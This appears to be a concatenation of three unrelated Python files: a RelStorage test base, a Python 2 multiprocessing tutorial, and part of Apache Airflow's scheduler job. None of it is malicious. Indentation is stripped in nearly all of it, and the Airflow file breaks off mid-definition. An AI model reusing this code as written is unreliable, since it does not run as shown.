meth = self._create_dest_storage
storage = meth()
if zap:
storage.zap_all(slow=self.zap_slow)
return storage
def _cfg_header(self):
return '%import relstorage\n' + super(AbstractRSZodbConvertTests, self)._cfg_header()
def _cfg_relstorage(self, name, _path, blob_dir):
cfg = dedent("""
<relstorage>
%(rs_config)s
keep-history %(rs_keep_history)s
blob-dir %(rs_blobs)s
cache-prefix %(rs_name)s
cache-local-dir %(rs_cache_path)s
</relstorage>
""" % {
'rs_name': name,
'rs_keep_history': 'true' if self.keep_history else 'false',
'rs_blobs': blob_dir,
'rs_config': self.get_adapter_zconfig(),
'rs_cache_path': os.path.abspath('.'),
})
return cfg
def _cfg_one(self, name, path, blob_dir):
if name == self.filestorage_name:
meth = self._cfg_filestorage
else:
assert name == self.relstorage_name
meth = self._cfg_relstorage
return meth(name, path, blob_dir)
def test_new_instance_still_zlib(self):
storage = self._closing(self.make_storage())
new_storage = self._closing(storage.new_instance())
self.assertIsInstance(new_storage,
ZlibStorage)
self.assertIn('_crs_untransform_record_data', storage.base.__dict__)
self.assertIn('_crs_transform_record_data', storage.base.__dict__)
self.assertIn('_crs_untransform_record_data', new_storage.base.__dict__)
self.assertIn('_crs_transform_record_data', new_storage.base.__dict__)
self.assertEqual(new_storage.copyTransactionsFrom,
new_storage.base.copyTransactionsFrom)
class AbstractRSDestHPZodbConvertTests(AbstractRSZodbConvertTests):
keep_history = True
zap_supported_by_dest = True
dest_db_needs_closed_before_zodbconvert = False
class AbstractRSDestHFZodbConvertTests(AbstractRSZodbConvertTests):
keep_history = False
zap_supported_by_dest = True
dest_db_needs_closed_before_zodbconvert = False
class AbstractRSSrcZodbConvertTests(AbstractRSZodbConvertTests):
src_db_needs_closed_before_zodbconvert = False
filestorage_name = 'destination'
relstorage_name = 'source'
class AbstractIDBOptionsTest(unittest.TestCase):
db_options = None
def test_db_options_compliance(self):
from hamcrest import assert_that
from nti.testing.matchers import validly_provides
from relstorage.adapters.interfaces import IDBDriverOptions
from relstorage.adapters.interfaces import IDBDriverFactory
__traceback_info__ = self.db_options
assert_that(self.db_options, validly_provides(IDBDriverOptions))
for factory in self.db_options.known_driver_factories():
assert_that(factory, validly_provides(IDBDriverFactory))
class AbstractIDBDriverTest(unittest.TestCase):
driver = None
def test_db_driver_compliance(self):
from hamcrest import assert_that
from nti.testing.matchers import validly_provides
from relstorage.adapters.interfaces import IDBDriver
__traceback_info__ = self.driver
assert_that(self.driver, validly_provides(IDBDriver))
class DoubleCommitter(Persistent):
"""A crazy persistent class that changes self in __getstate__"""
def __getstate__(self):
if not hasattr(self, 'new_attribute'):
self.new_attribute = 1 # pylint:disable=attribute-defined-outside-init
return Persistent.__getstate__(self)
def _close_and_clean_storage(storage):
try:
storage.close()
storage.cleanup()
except Exception: # pylint:disable=broad-except
pass
class AbstractToFileStorage(RelStorageTestBase):
# Subclass this and set:
# - keep_history = True; and
# - A base class of UndoableRecoveryStorage
#
# or
# - keep_history = False; and
# A base class of BasicRecoveryStorage
# We rely on being placed in a temporary directory by a super
# class that will be cleaned up by tearDown().
def setUp(self):
super(AbstractToFileStorage, self).setUp()
# Use the abspath so that even if we close it after
# we've returned to our original directory (e.g.,
# close is run as part of addCleanup(), which happens after
# tearDown) we don't write index files into the original directory.
self._dst_path = os.path.abspath(self.rs_temp_prefix + 'Dest.fs')
self.__dst = None
@property
def _dst(self):
if self.__dst is None:
self.__dst = FileStorage(self._dst_path, create=True)
# On Windows, though, this could be too late: We can't remove
# files that are still open, and zope.testing.setupstack
# was asked to remove the temp dir as part of tearing itself down;
# cleanups run after tearDown runs (which is when the setupstack runs.)
self.addCleanup(_close_and_clean_storage, self.__dst)
return self.__dst
def tearDown(self):
if hasattr(self.__dst, 'close'):
_close_and_clean_storage(self.__dst)
self.__dst = 42 # Not none so we don't try to create.
super(AbstractToFileStorage, self).tearDown()
def new_dest(self):
return self._closing(FileStorage(self._dst_path))
class AbstractFromFileStorage(RelStorageTestBase):
# As for AbstractToFileStorage
def setUp(self):
super(AbstractFromFileStorage, self).setUp()
self._src_path = os.path.abspath(self.rs_temp_prefix + 'Source.fs')
self.__dst = None
def make_storage_to_cache(self):
return FileStorage(self._src_path, create=True)
@property
def _dst(self):
if self.__dst is None:
self.__dst = self.make_storage()
self.addCleanup(_close_and_clean_storage, self.__dst)
return self.__dst
def tearDown(self):
if hasattr(self.__dst, 'close'):
_close_and_clean_storage(self.__dst)
self.__dst = 42 # Not none so we don't try to create.
super(AbstractFromFileStorage, self).tearDown()
def new_dest(self):
return self._dst
|
ProcessChapter9.py
|
# encoding:UTF-8
import os
import random
import time
from multiprocessing import Process, Pool, Queue
__author__ = 'Hope6537'
# The multiprocessing module provides a Process class that represents a process object. The example below starts a child process and waits for it to finish:
def run_proc(name):
print 'Run child process %s (%s)...' % (name, os.getpid())
if __name__ == '__main__':
print 'Parent process %s.' % os.getpid()
# Create the process object
p = Process(target=run_proc, args=('test',))
print 'Process will start.'
p.start()
# Effectively synchronous: wait for the child process to finish before continuing
p.join()
print 'Process end.'
# If you need to launch a large number of child processes, a process pool is the way to go
def long_time_task(name):
print 'Run task %s (%s)...' % (name, os.getpid())
start = time.time()
time.sleep(random.random() * 3)
end = time.time()
print 'Task %s runs %0.2f seconds.' % (name, (end - start))
# Note the output: tasks 0, 1, 2 and 3 start right away, while task 4 has to wait until one of the earlier tasks finishes.
# That is because the default Pool size on my machine is 4, so at most 4 processes run at the same time. This is a deliberate limit of Pool, not an operating-system limit.
if __name__ == '__main__':
print 'Parent process %s.' % os.getpid()
# Set here the maximum number of child processes that may run at once
p = Pool(2)
for i in range(5):
p.apply_async(long_time_task, args=(i,))
print 'Waiting for all subprocesses done...'
# Close the pool
p.close()
# Wait for all tasks to complete
p.join()
print 'All subprocesses done.'
# Processes of course need to communicate, and the operating system offers many mechanisms for inter-process communication.
# Python's multiprocessing module wraps the low-level mechanisms and provides several ways to exchange data, such as Queue and Pipe (a short Pipe sketch is appended at the end of this file for illustration).
# Code executed by the writer process:
def write(q):
for value in ['A', 'B', 'C']:
print 'Put %s to queue...' % value
q.put(value)
time.sleep(random.random())
# Code executed by the reader process:
def read(q):
while True:
value = q.get(True)
print 'Get %s from queue.' % value
# multiprocessing has to "simulate" the effect of fork: every Python object in the parent process must be serialized with pickle and passed to the child process.
# So if a multiprocessing call fails on Windows, first check whether pickling failed.
if __name__ == '__main__':
# The parent process creates the Queue and passes it to each child process:
q = Queue()
pw = Process(target=write, args=(q,))
pr = Process(target=read, args=(q,))
# Start child process pw to write:
pw.start()
# Start child process pr to read:
pr.start()
# Wait for pw to finish:
pw.join()
# The pr process runs an infinite loop, so we cannot wait for it to finish and have to terminate it forcibly:
pr.terminate()
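# The note above also mentions Pipes. The sketch below is an added illustration
# (it is not part of the original tutorial): multiprocessing.Pipe() returns two
# connection objects, and whatever one end send()s the other end can recv().
def pipe_child(conn):
    # Child process: push a few values through its end of the pipe, then close it.
    for value in ['X', 'Y', 'Z']:
        conn.send(value)
    conn.close()

if __name__ == '__main__':
    from multiprocessing import Pipe
    parent_conn, child_conn = Pipe()
    pc = Process(target=pipe_child, args=(child_conn,))
    pc.start()
    for _ in range(3):
        print(parent_conn.recv())  # prints X, Y, Z in order
    pc.join()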
|
scheduler_job.py
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import logging
import multiprocessing
import os
import signal
import sys
import threading
import time
from collections import defaultdict
from contextlib import redirect_stderr, redirect_stdout
from datetime import timedelta
from time import sleep
from typing import List, Set
from setproctitle import setproctitle
from sqlalchemy import and_, func, not_, or_
from sqlalchemy.orm.session import make_transient
from airflow import models, settings
from airflow.configuration import conf
from airflow.exceptions import AirflowException
from airflow.executors.local_executor import LocalExecutor
from airflow.executors.sequential_executor import SequentialExecutor
from airflow.jobs.base_job import BaseJob
from airflow.models import DAG, DagRun, SlaMiss, errors
from airflow.models.taskinstance import SimpleTaskInstance
from airflow.stats import Stats
from airflow.ti_deps.dep_context import SCHEDULEABLE_STATES, SCHEDULED_DEPS, DepContext
from airflow.ti_deps.deps.pool_slots_available_dep import STATES_TO_COUNT_AS_RUNNING
from airflow.utils import asciiart, helpers, timezone
from airflow.utils.dag_processing import (
AbstractDagFileProcessorProcess, DagFileProcessorAgent, SimpleDag, SimpleDagBag,
)
from airflow.utils.db import provide_session
from airflow.utils.email import get_email_address_list, send_email
from airflow.utils.file import list_py_file_paths
from airflow.utils.log.logging_mixin import LoggingMixin, StreamLogWriter, set_context
from airflow.utils.state import State
class DagFileProcessorProcess(AbstractDagFileProcessorProcess, LoggingMixin):
"""Runs DAG processing in a separate process using DagFileProcessor
:param file_path: a Python file containing Airflow DAG definitions
:type file_path: str
:param pickle_dags: whether to serialize the DAG objects to the DB
:type pickle_dags: bool
:param dag_id_white_list: If specified, only look at these DAG ID's
:type dag_id_white_list: List[str]
:param zombies: zombie task instances to kill
:type zombies: List[airflow.models.taskinstance.SimpleTaskInstance]
"""
# Counter that increments every time an instance of this class is created
class_creation_counter = 0
def __init__(self, file_path, pickle_dags, dag_id_white_list, zombies):
self._file_path = file_path
# The process that was launched to process the given file.
self._process = None
self._dag_id_white_list = dag_id_white_list
self._pickle_dags = pickle_dags
self._zombies = zombies
# The result of Scheduler.process_file(file_path).
self._result = None
# Whether the process is done running.
self._done = False
# When the process started.
self._start_time = None
# This ID is used to uniquely name the process / thread that's launched
# by this processor instance
self._instance_id = DagFileProcessorProcess.class_creation_counter
DagFileProcessorProcess.class_creation_counter += 1
@property
def file_path(self):
return self._file_path
@staticmethod
def _run_file_processor(result_channel,
file_path,
pickle_dags,
dag_id_white_list,
thread_name,
zombies):
"""
Process the given file.
:param result_channel: the connection to use for passing back the result
:type result_channel: multiprocessing.Connection
:param file_path: the file to process
:type file_path: str
:param pickle_dags: whether to pickle the DAGs found in the file and
save them to the DB
:type pickle_dags: bool
:param dag_id_white_list: if specified, only examine DAG ID's that are
in this list
:type dag_id_white_list: list[str]
:param thread_name: the name to use for the process that is launched
:type thread_name: str
:param zombies: zombie task instances to kill
:type zombies: list[airflow.models.taskinstance.SimpleTaskInstance]
:return: the process that was launched
:rtype: multiprocessing.Process
"""
# This helper runs in the newly created process
log = logging.getLogger("airflow.processor")
set_context(log, file_path)
setproctitle("airflow scheduler - DagFileProcessor {}".format(file_path))
try:
# redirect stdout/stderr to log
with redirect_stdout(StreamLogWriter(log, logging.INFO)),\
redirect_stderr(StreamLogWriter(log, logging.WARN)):
# Re-configure the ORM engine as there are issues with multiple processes
settings.configure_orm()
# Change the thread name to differentiate log lines. This is
# really a separate process, but changing the name of the
# process doesn't work, so changing the thread name instead.
threading.current_thread().name = thread_name
start_time = time.time()
log.info("Started process (PID=%s) to work on %s", os.getpid(), file_path)
dag_file_processor = DagFileProcessor(dag_ids=dag_id_white_list, log=log)
result = dag_file_processor.process_file(
file_path=file_path,
zombies=zombies,
pickle_dags=pickle_dags
)
result_channel.send(result)
end_time = time.time()
log.info(
"Processing %s took %.3f seconds", file_path, end_time - start_time
)
except Exception:
# Log exceptions through the logging framework.
log.exception("Got an exception! Propagating...")
raise
finally:
result_channel.close()
# We re-initialized the ORM within this Process above so we need to
# tear it down manually here
settings.dispose_orm()
def start(self):
"""
Launch the process and start processing the DAG.
"""
self._parent_channel, _child_channel = multiprocessing.Pipe()
self._process = multiprocessing.Process(
target=type(self)._run_file_processor,
args=(
_child_channel,
self.file_path,
self._pickle_dags,
self._dag_id_white_list,
"DagFileProcessor{}".format(self._instance_id),
self._zombies
),
name="DagFileProcessor{}-Process".format(self._instance_id)
)
self._start_time = timezone.utcnow()
self._process.start()
def kill(self):
"""
Kill the process launched to process the file, and ensure consistent state.
"""
if self._process is None:
raise AirflowException("Tried to kill before starting!")
# The queue will likely get corrupted, so remove the reference
self._result_queue = None
self._kill_process()
def terminate(self, sigkill=False):
"""
Terminate (and then kill) the process launched to process the file.
:param sigkill: whether to issue a SIGKILL if SIGTERM doesn't work.
:type sigkill: bool
"""
if self._process is None:
raise AirflowException("Tried to call terminate before starting!")
self._process.terminate()
# Arbitrarily wait 5s for the process to die
self._process.join(5)
if sigkill:
self._kill_process()
self._parent_channel.close()
def _kill_process(self):
if self._process.is_alive():
self.log.warning("Killing PID %s", self._process.pid)
os.kill(self._process.pid, signal.SIGKILL)
@property
def pid(self):
"""
:return: the PID of the process launched to process the given file
:rtype: int
"""
if self._process is None:
raise AirflowException("Tried to get PID before starting!")
return self._process.pid
@property
def exit_code(self):
"""
After the process is finished, this can be called to get the return code
:return: the exit code of the process
:rtype: int
"""
if not self._done:
raise AirflowException("Tried to call retcode before process was finished!")
return self._process.exitcode
@property
def done(self):
"""
Check if the process launched to process this file is done.
:return: whether the process is finished running
:rtype: bool
"""
if self._process is None:
raise AirflowException("Tried to see if it's done before starting!")
if self._done:
return True
if self._parent_channel.poll():
try:
self._result = self._parent_channel.recv()
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
except EOFError:
pass
if not self._process.is_alive():
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
return False
@property
def result(self):
"""
:return: result of running SchedulerJob.process_file()
:rtype: airflow.utils.dag_processing.SimpleDag
"""
if not self.done:
raise AirflowException("Tried to get the result before it's done!")
return self._result
@property
def start_time(self):
"""
:return: when this started to process the file
:rtype: datetime
"""
if self._start_time is None:
raise AirflowException("Tried to get start time before it started!")
return self._start_time
class DagFileProcessor(LoggingMixin):
"""
Process a Python file containing Airflow DAGs.
This includes:
1. Execute the file and look for DAG objects in the namespace.
2. Pickle the DAG and save it to the DB (if necessary).
3. For each DAG, see what tasks should run and create appropriate task
instances in the DB.
4. Record any errors importing the file into ORM
5. Kill (in ORM) any task instances belonging to the DAGs that haven't
issued a heartbeat in a while.
Returns a list of SimpleDag objects that represent the DAGs found in
the file
:param dag_ids: If specified, only look at these DAG ID's
:type dag_ids: List[str]
:param log: Logger to use while processing the file
:type log: logging.Logger
"""
def __init__(self, dag_ids, log):
self.dag_ids = dag_ids
self._log = log
@provide_session
def manage_slas(self, dag, session=None):
"""
Find all tasks that have SLAs defined and send alert emails
where needed. New SLA misses are also recorded in the database.
We are assuming that the scheduler runs often, so we only check for
tasks that should have succeeded in the past hour.
"""
if not any([isinstance(ti.sla, timedelta) for ti in dag.tasks]):
self.log.info("Skipping SLA check for %s because no tasks in DAG have SLAs", dag)
return
TI = models.TaskInstance
sq = (
session
.query(
TI.task_id,
func.max(TI.execution_date).label('max_ti')
)
.with_hint(TI, 'USE INDEX (PRIMARY)', dialect_name='mysql')
.filter(TI.dag_id == dag.dag_id)
.filter(
or_(
TI.state == State.SUCCESS,
TI.state == State.SKIPPED
)
)
.filter(TI.task_id.in_(dag.task_ids))
.group_by(TI.task_id).subquery('sq')
)
max_tis = session.query(TI).filter(
TI.dag_id == dag.dag_id,
TI.task_id == sq.c.task_id,
TI.execution_date == sq.c.max_ti,
).all()
ts = timezone.utcnow()
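# Worked example with illustrative numbers: for a daily DAG whose latest
# successful run has execution_date 2020-01-01 and a task with
# sla=timedelta(hours=2), the loop below starts at dttm=2020-01-02; that
# run's deadline is following_schedule(dttm) + sla = 2020-01-03 02:00,
# and if "now" is already past it, an SlaMiss row with
# execution_date=2020-01-02 is recorded.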
for ti in max_tis:
task = dag.get_task(ti.task_id)
dttm = ti.execution_date
if isinstance(task.sla, timedelta):
dttm = dag.following_schedule(dttm)
while dttm < timezone.utcnow():
following_schedule = dag.following_schedule(dttm)
if following_schedule + task.sla < timezone.utcnow():
session.merge(SlaMiss(
task_id=ti.task_id,
dag_id=ti.dag_id,
execution_date=dttm,
timestamp=ts))
dttm = dag.following_schedule(dttm)
session.commit()
slas = (
session
.query(SlaMiss)
.filter(SlaMiss.notification_sent == False, SlaMiss.dag_id == dag.dag_id) # noqa pylint: disable=singleton-comparison
.all()
)
if slas:
sla_dates = [sla.execution_date for sla in slas]
qry = (
session
.query(TI)
.filter(
TI.state != State.SUCCESS,
TI.execution_date.in_(sla_dates),
TI.dag_id == dag.dag_id
).all()
)
blocking_tis = []
for ti in qry:
if ti.task_id in dag.task_ids:
ti.task = dag.get_task(ti.task_id)
blocking_tis.append(ti)
else:
session.delete(ti)
session.commit()
task_list = "\n".join([
sla.task_id + ' on ' + sla.execution_date.isoformat()
for sla in slas])
blocking_task_list = "\n".join([
ti.task_id + ' on ' + ti.execution_date.isoformat()
for ti in blocking_tis])
# Track whether email or any alert notification sent
# We consider email or the alert callback as notifications
email_sent = False
notification_sent = False
if dag.sla_miss_callback:
# Execute the alert callback
self.log.info(' --------------> ABOUT TO CALL SLA MISS CALL BACK ')
try:
dag.sla_miss_callback(dag, task_list, blocking_task_list, slas,
blocking_tis)
notification_sent = True
except Exception:
self.log.exception("Could not call sla_miss_callback for DAG %s",
dag.dag_id)
email_content = """\
Here's a list of tasks that missed their SLAs:
<pre><code>{task_list}\n</code></pre>
Blocking tasks:
<pre><code>{blocking_task_list}\n{bug}</code></pre>
""".format(task_list=task_list, blocking_task_list=blocking_task_list,
bug=asciiart.bug)
tasks_missed_sla = [dag.get_task(sla.task_id) for sla in slas]
emails = set()
for task in tasks_missed_sla:
if task.email:
if isinstance(task.email, str):
emails |= set(get_email_address_list(task.email))
elif isinstance(task.email, (list, tuple)):
emails |= set(task.email)
if emails:
try:
send_email(
emails,
"[airflow] SLA miss on DAG=" + dag.dag_id,
email_content)
email_sent = True
notification_sent = True
except Exception:
self.log.exception("Could not send SLA Miss email notification for"
" DAG %s", dag.dag_id)
# If we sent any notification, update the sla_miss table
if notification_sent:
for sla in slas:
if email_sent:
sla.email_sent = True
sla.notification_sent = True
session.merge(sla)
session.commit()
@staticmethod
def update_import_errors(session, dagbag):
"""
For the DAGs in the given DagBag, record any associated import errors and clear
errors for files that no longer have them. These are usually displayed through the
Airflow UI so that users know that there are issues parsing DAGs.
:param session: session for ORM operations
:type session: sqlalchemy.orm.session.Session
:param dagbag: DagBag containing DAGs with import errors
:type dagbag: airflow.models.DagBag
"""
# Clear the errors of the processed files
for dagbag_file in dagbag.file_last_changed:
session.query(errors.ImportError).filter(
errors.ImportError.filename == dagbag_file
).delete()
# Add the errors of the processed files
for filename, stacktrace in dagbag.import_errors.items():
session.add(errors.ImportError(
filename=filename,
stacktrace=stacktrace))
session.commit()
@provide_session
def create_dag_run(self, dag, session=None):
"""
This method checks whether a new DagRun needs to be created
for a DAG based on scheduling interval.
Returns DagRun if one is scheduled. Otherwise returns None.
"""
if dag.schedule_interval and conf.getboolean('scheduler', 'USE_JOB_SCHEDULE'):
active_runs = DagRun.find(
dag_id=dag.dag_id,
state=State.RUNNING,
external_trigger=False,
session=session
)
# return if already reached maximum active runs and no timeout setting
if len(active_runs) >= dag.max_active_runs and not dag.dagrun_timeout:
return
timedout_runs = 0
for dr in active_runs:
if (
dr.start_date and dag.dagrun_timeout and
dr.start_date < timezone.utcnow() - dag.dagrun_timeout
):
dr.state = State.FAILED
dr.end_date = timezone.utcnow()
dag.handle_callback(dr, success=False, reason='dagrun_timeout',
session=session)
timedout_runs += 1
session.commit()
if len(active_runs) - timedout_runs >= dag.max_active_runs:
return
# this query should be replaced by find dagrun
qry = (
session.query(func.max(DagRun.execution_date))
.filter_by(dag_id=dag.dag_id)
.filter(or_(
DagRun.external_trigger == False, # noqa: E712 pylint: disable=singleton-comparison
# add % as a wildcard for the like query
DagRun.run_id.like(DagRun.ID_PREFIX + '%')
)
)
)
last_scheduled_run = qry.scalar()
# don't schedule @once again
if dag.schedule_interval == '@once' and last_scheduled_run:
return None
# don't do scheduler catchup for dags that don't have dag.catchup = True
if not (dag.catchup or dag.schedule_interval == '@once'):
# The logic is that we move start_date up until
# one period before, so that timezone.utcnow() is AFTER
# the period end, and the job can be created...
now = timezone.utcnow()
next_start = dag.following_schedule(now)
last_start = dag.previous_schedule(now)
if next_start <= now:
new_start = last_start
else:
new_start = dag.previous_schedule(last_start)
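# Worked example of the shift above (illustrative, daily schedule at
# midnight): if now is 2020-01-10 06:00, following_schedule(now) is
# 2020-01-11 00:00 (> now) and previous_schedule(now) is 2020-01-10 00:00,
# so new_start becomes 2020-01-09 00:00, one full period earlier; the first
# period's end is then already in the past and a run can be created
# immediately.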
if dag.start_date:
if new_start >= dag.start_date:
dag.start_date = new_start
else:
dag.start_date = new_start
next_run_date = None
if not last_scheduled_run:
# First run
task_start_dates = [t.start_date for t in dag.tasks]
if task_start_dates:
next_run_date = dag.normalize_schedule(min(task_start_dates))
self.log.debug(
"Next run date based on tasks %s",
next_run_date
)
else:
next_run_date = dag.following_schedule(last_scheduled_run)
# make sure backfills are also considered
last_run = dag.get_last_dagrun(session=session)
if last_run and next_run_date:
while next_run_date <= last_run.execution_date:
next_run_date = dag.following_schedule(next_run_date)
# don't ever schedule prior to the dag's start_date
if dag.start_date:
next_run_date = (dag.start_date if not next_run_date
else max(next_run_date, dag.start_date))
if next_run_date == dag.start_date:
next_run_date = dag.normalize_schedule(dag.start_date)
self.log.debug(
"Dag start date: %s. Next run date: %s",
dag.start_date, next_run_date
)
# don't ever schedule in the future or if next_run_date is None
if not next_run_date or next_run_date > timezone.utcnow():
return
# this structure is necessary to avoid a TypeError from concatenating
# NoneType
if dag.schedule_interval == '@once':
period_end = next_run_date
elif next_run_date:
period_end = dag.following_schedule(next_run_date)
# Don't schedule a dag beyond its end_date (as specified by the dag param)
if next_run_date and dag.end_date and next_run_date > dag.end_date:
return
# Don't schedule a dag beyond its end_date (as specified by the task params)
# Get the min task end date, which may come from the dag.default_args
min_task_end_date = []
task_end_dates = [t.end_date for t in dag.tasks if t.end_date]
if task_end_dates:
min_task_end_date = min(task_end_dates)
if next_run_date and min_task_end_date and next_run_date > min_task_end_date:
return
if next_run_date and period_end and period_end <= timezone.utcnow():
next_run = dag.create_dagrun(
run_id=DagRun.ID_PREFIX + next_run_date.isoformat(),
execution_date=next_run_date,
start_date=timezone.utcnow(),
state=State.RUNNING,
external_trigger=False
)
return next_run
@provide_session
def _process_task_instances(self, dag, task_instances_list, session=None):
"""
This method schedules the tasks for a single DAG by looking at the
active DAG runs and adding task instances that should run to the
queue.
"""
# update the state of the previously active dag runs
dag_runs = DagRun.find(dag_id=dag.dag_id, state=State.RUNNING, session=session)
active_dag_runs = []
for run in dag_runs:
self.log.info("Examining DAG run %s", run)
# don't consider runs that are executed in the future
if run.execution_date > timezone.utcnow():
self.log.error(
"Execution date is in future: %s",
run.execution_date
)
continue
if len(active_dag_runs) >= dag.max_active_runs:
self.log.info("Number of active dag runs reached max_active_run.")
break
# skip backfill dagruns for now as long as they are not really scheduled
if run.is_backfill:
continue
# todo: run.dag is transient but needs to be set
run.dag = dag
# todo: preferably the integrity check happens at dag collection time
run.verify_integrity(session=session)
run.update_state(session=session)
if run.state == State.RUNNING:
make_transient(run)
active_dag_runs.append(run)
for run in active_dag_runs:
self.log.debug("Examining active DAG run: %s", run)
tis = run.get_task_instances(state=SCHEDULEABLE_STATES)
# this loop is quite slow as it uses are_dependencies_met for
# every task (in ti.is_runnable). This is also called in
# update_state above which has already checked these tasks
for ti in tis:
task = dag.get_task(ti.task_id)
# fixme: ti.task is transient but needs to be set
ti.task = task
if ti.are_dependencies_met(
dep_context=DepContext(flag_upstream_failed=True),
session=session
):
self.log.debug('Queuing task: %s', ti)
task_instances_list.append(ti.key)
def _process_dags(self, dagbag, dags, tis_out):
"""
Iterates over the dags and processes them. Processing includes:
1. Create appropriate DagRun(s) in the DB.
2. Create appropriate TaskInstance(s) in the DB.
3. Send emails for tasks that have missed SLAs.
:param dagbag: a collection of DAGs to process
:type dagbag: airflow.models.DagBag
:param dags: the DAGs from the DagBag to process
:type dags: airflow.models.DAG
:param tis_out: A list to add generated TaskInstance objects
:type tis_out: list[TaskInstance]
:rtype: None
"""
for dag in dags:
dag = dagbag.get_dag(dag.dag_id)
if not dag:
self.log.error("DAG ID %s was not found in the DagBag", dag.dag_id)
continue
if dag.is_paused:
self.log.info("Not processing DAG %s since it's paused", dag.dag_id)
continue
self.log.info("Processing %s", dag.dag_id)
# Only create a DagRun for DAGs that are not subdags, since
# DagRuns of subdags are created when the SubDagOperator executes.
if not dag.is_subdag:
dag_run = self.create_dag_run(dag)
if dag_run:
expected_start_date = dag.following_schedule(dag_run.execution_date)
if expected_start_date:
schedule_delay = dag_run.start_date - expected_start_date
Stats.timing(
'dagrun.schedule_delay.{dag_id}'.format(dag_id=dag.dag_id),
schedule_delay)
self.log.info("Created %s", dag_run)
self._process_task_instances(dag, tis_out)
self.manage_slas(dag)
def _find_dags_to_process(self, dags: List[DAG], paused_dag_ids: Set[str]):
"""
Find the DAGs that are not paused to process.
:param dags: specified DAGs
:param paused_dag_ids: paused DAG IDs
:return: DAGs to process
"""
if len(self.dag_ids) > 0:
dags = [dag for dag in dags
if dag.dag_id in self.dag_ids and
dag.dag_id not in paused_dag_ids]
else:
dags = [dag for dag in dags
if dag.dag_id not in paused_dag_ids]
return dags
@provide_session
def process_file(self, file_path, zombies, pickle_dags=False, session=None):
"""
Process a Python file containing Airflow DAGs.
This includes:
1. Execute the file and look for DAG objects in the namespace.
2. Pickle the DAG and save it to the DB (if necessary).
3. For each DAG, see what tasks should run and create appropriate task
instances in the DB.
4. Record any errors importing the file into ORM
5. Kill (in ORM) any task instances belonging to the DAGs that haven't
issued a heartbeat in a while.
Returns a list of SimpleDag objects that represent the DAGs found in
the file
:param file_path: the path to the Python file that should be executed
:type file_path: str
:param zombies: zombie task instances to kill.
:type zombies: List[airflow.models.taskinstance.SimpleTaskInstance]
:param pickle_dags: whether to serialize the DAGs found in the file and
save them to the db
:type pickle_dags: bool
:return: a list of SimpleDags made from the Dags found in the file
:rtype: List[airflow.utils.dag_processing.SimpleDagBag]
"""
self.log.info("Processing file %s for tasks to queue", file_path)
# As DAGs are parsed from this file, they will be converted into SimpleDags
simple_dags = []
try:
dagbag = models.DagBag(file_path, include_examples=False)
except Exception:
self.log.exception("Failed at reloading the DAG file %s", file_path)
Stats.incr('dag_file_refresh_error', 1, 1)
return [], []
if len(dagbag.dags) > 0:
self.log.info("DAG(s) %s retrieved from %s", dagbag.dags.keys(), file_path)
else:
self.log.warning("No viable dags retrieved from %s", file_path)
self.update_import_errors(session, dagbag)
return [], len(dagbag.import_errors)
# Save individual DAGs in the ORM and update DagModel.last_scheduled_time
for dag in dagbag.dags.values():
dag.sync_to_db()
paused_dag_ids = {dag.dag_id for dag in dagbag.dags.values() if dag.is_paused}
# Pickle the DAGs (if necessary) and put them into a SimpleDag
for dag_id in dagbag.dags:
# Only return DAGs that are not paused
if dag_id not in paused_dag_ids:
dag = dagbag.get_dag(dag_id)
pickle_id = None
if pickle_dags:
pickle_id = dag.pickle(session).id
simple_dags.append(SimpleDag(dag, pickle_id=pickle_id))
dags = self._find_dags_to_process(dagbag.dags.values(), paused_dag_ids)
# Not using multiprocessing.Queue() since it's no longer a separate
# process and due to some unusual behavior. (empty() incorrectly
# returns true as described in https://bugs.python.org/issue23582 )
ti_keys_to_schedule = []
self._process_dags(dagbag, dags, ti_keys_to_schedule)
for ti_key in ti_keys_to_schedule:
dag = dagbag.dags[ti_key[0]]
task = dag.get_task(ti_key[1])
ti = models.TaskInstance(task, ti_key[2])
ti.refresh_from_db(session=session, lock_for_update=True)
# We check only deps needed to set TI to SCHEDULED state here.
# Deps needed to set TI to QUEUED state will be batch checked later
# by the scheduler for better performance.
dep_context = DepContext(deps=SCHEDULED_DEPS, ignore_task_deps=True)
# Only schedule tasks that have their dependencies met, e.g. to avoid
# a task that recently got its state changed to RUNNING from somewhere
# other than the scheduler from getting its state overwritten.
if ti.are_dependencies_met(
dep_context=dep_context,
session=session,
verbose=True
):
# Task starts out in the scheduled state. All tasks in the
# scheduled state will be sent to the executor
ti.state = State.SCHEDULED
# Also save this task instance to the DB.
self.log.info("Creating / updating %s in ORM", ti)
session.merge(ti)
# commit batch
session.commit()
# Record import errors into the ORM
try:
self.update_import_errors(session, dagbag)
except Exception:
self.log.exception("Error logging import errors!")
try:
dagbag.kill_zombies(zombies)
except Exception:
self.log.exception("Error killing zombies!")
return simple_dags, len(dagbag.import_errors)
class SchedulerJob(BaseJob):
"""
This SchedulerJob runs for a specific time interval and schedules the jobs
that are ready to run. It figures out the latest runs for each
task and sees if the dependencies for the next schedules are met.
If so, it creates appropriate TaskInstances and sends run commands to the
executor. It does this for each task in each DAG and repeats.
:param dag_id: if specified, only schedule tasks with this DAG ID
:type dag_id: str
:param dag_ids: if specified, only schedule tasks with these DAG IDs
:type dag_ids: list[str]
:param subdir: directory containing Python files with Airflow DAG
definitions, or a specific path to a file
:type subdir: str
:param num_runs: The number of times to try to schedule each DAG file.
-1 for unlimited times.
:type num_runs: int
:param processor_poll_interval: The number of seconds to wait between
polls of running processors
:type processor_poll_interval: int
:param do_pickle: once a DAG object is obtained by executing the Python
file, whether to serialize the DAG object to the DB
:type do_pickle: bool
"""
__mapper_args__ = {
'polymorphic_identity': 'SchedulerJob'
}
heartrate = conf.getint('scheduler', 'SCHEDULER_HEARTBEAT_SEC')
def __init__(
self,
dag_id=None,
dag_ids=None,
subdir=settings.DAGS_FOLDER,
num_runs=conf.getint('scheduler', 'num_runs'),
